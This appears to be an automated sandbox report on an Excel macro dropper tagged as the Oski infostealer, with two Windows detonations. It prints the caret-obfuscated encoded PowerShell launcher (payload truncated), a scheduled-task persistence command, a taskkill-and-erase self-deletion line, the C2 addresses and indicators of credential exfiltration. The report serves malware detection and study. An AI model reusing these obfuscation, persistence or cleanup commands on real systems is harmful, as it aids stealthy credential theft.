Malware Analysis Report

2025-06-16 03:09

Sample ID: 210806-b772dyay8s
Target: SAMPLE ORDER .xls
SHA256: 78bbff7297f8be0a95a2c3942c7c8d80bd6d68bc561543ba7c4275eb2e15e649
Tags: macro, oski, infostealer, spyware, suricata
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: 78bbff7297f8be0a95a2c3942c7c8d80bd6d68bc561543ba7c4275eb2e15e649
Threat Level: Known bad

The file SAMPLE ORDER .xls was found to be: Known bad.

Malicious Activity Summary

Tags: macro, oski, infostealer, spyware, suricata

  suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  Process spawned unexpected child process
  Oski
  Downloads MZ/PE file
  Suspicious Office macro
  Loads dropped DLL
  Accesses cryptocurrency files/wallets, possible credential harvesting
  Suspicious use of SetThreadContext
  Office loads VBA resources, possible macro or embedded object present
  Creates scheduled task(s)
  Suspicious use of FindShellTrayWindow
  Suspicious use of AdjustPrivilegeToken
  Enumerates system info in registry
  Checks processor information in registry
  Suspicious use of WriteProcessMemory
  Suspicious behavior: EnumeratesProcesses
  Suspicious use of SetWindowsHookEx
  Kills process with taskkill
  Modifies Internet Explorer settings
  Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2021-08-06 13:54

Signatures

Suspicious Office macro [macro]

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2021-08-06 13:54
Reported: 2021-08-06 13:59
Platform: win7v20210410
Max time kernel: 122s
Max time network: 164s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

Signatures

Oski [infostealer oski]

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Downloads MZ/PE file

Accesses cryptocurrency files/wallets, possible credential harvesting [spyware]

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 824 set thread context of 556 | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Users\Admin\AppData\Local\Temp\lzzn.exe

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | N/A

Creates scheduled task(s) [persistence]

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Kills process with taskkill [evasion]

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Modifies Internet Explorer settings [adware spyware]

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A (2 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A (2 events) | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1304 wrote to memory of 1628 (4 events) | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1628 wrote to memory of 760 (4 events) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 824 (4 events) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 824 wrote to memory of 1572 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Windows\SysWOW64\schtasks.exe
PID 824 wrote to memory of 556 (10 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 556 wrote to memory of 1784 (4 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Windows\SysWOW64\cmd.exe
PID 1784 wrote to memory of 364 (4 events) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c pO^W^Ers^He^LL -e …

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pOWErsHeLL -e …

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BqppCjWADhQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2694.tmp"

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 556 & erase C:\Users\Admin\AppData\Local\Temp\lzzn.exe & RD /S /Q C:\\ProgramData\\123557748826003\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 556

Network

Country | Destination | Domain | Proto
N/A | 46.183.223.34:80 | 46.183.223.34 | tcp
N/A | 185.212.131.198:80 | 185.212.131.198 | tcp

Files

C:\Users\Admin\AppData\Local\Temp\tmp2694.tmp

MD5 816866332859effe0b726cab9417f928
SHA1 fd7545796356c7fb8f056ab12c077a530ae08d34
SHA256 d04778d37af60e0679858c419a56368865df651d72ee38de73812d363cdc3e7d
SHA512 40460fb3d3b5e6edbbed45929b86919e9c1451d25a5cf6ea29ee92097e752246617bb6249b6c8580a7e5bec9d18a0c10a6abda6d98ce5fe4c439d6c6c6754aba

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Analysis: behavioral2

Detonation Overview

Submitted: 2021-08-06 13:54
Reported: 2021-08-06 13:59
Platform: win10v20210410
Max time kernel: 300s
Max time network: 302s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

Signatures

Oski [infostealer oski]

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) [suricata]

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil [suricata]

Downloads MZ/PE file

Loads dropped DLL

Description | Indicator | Process | Target
N/A (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | N/A

Accesses cryptocurrency files/wallets, possible credential harvesting [spyware]

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4724 set thread context of 5104 | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Users\Admin\AppData\Local\Temp\lzzn.exe

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Creates scheduled task(s) [persistence]

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Kills process with taskkill [evasion]

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4036 wrote to memory of 4064 (2 events) | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\cmd.exe
PID 4064 wrote to memory of 3936 (2 events) | N/A | C:\Windows\System32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3936 wrote to memory of 4724 (3 events) | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 4724 wrote to memory of 5004 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Windows\SysWOW64\schtasks.exe
PID 4724 wrote to memory of 5104 (9 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Users\Admin\AppData\Local\Temp\lzzn.exe
PID 5104 wrote to memory of 4284 (3 events) | N/A | C:\Users\Admin\AppData\Local\Temp\lzzn.exe | C:\Windows\SysWOW64\cmd.exe
PID 4284 wrote to memory of 4328 (3 events) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\SAMPLE ORDER .xls"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c pO^W^Ers^He^LL -e …

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pOWErsHeLL -e …

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BqppCjWADhQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8A6E.tmp"

C:\Users\Admin\AppData\Local\Temp\lzzn.exe

"C:\Users\Admin\AppData\Local\Temp\lzzn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 5104 & erase C:\Users\Admin\AppData\Local\Temp\lzzn.exe & RD /S /Q C:\\ProgramData\\148548454549621\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 5104

Network

Country | Destination | Domain | Proto
N/A | 46.183.223.34:80 | 46.183.223.34 | tcp
N/A | 185.212.131.198:80 | 185.212.131.198 | tcp

Files

C:\Users\Admin\AppData\Local\Temp\tmp8A6E.tmp

MD5 0e10691544eb2f616c343bd80d2eba6b
SHA1 895ebf3b86b56a97c90b960cb80b240fb10f688b
SHA256 f6abf46fc6b6cb54d40285ffa07fc22c556d7b1e6ad79a8ced262ef0d25a7353
SHA512 868543ab66fcca232f8c39fe3218343be83892f23c3680bfd33c5c47b5b9483d14c135a7fb76e1c67f5ca97e519b6c422d70cf946f40793da59406068de7c8b5

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
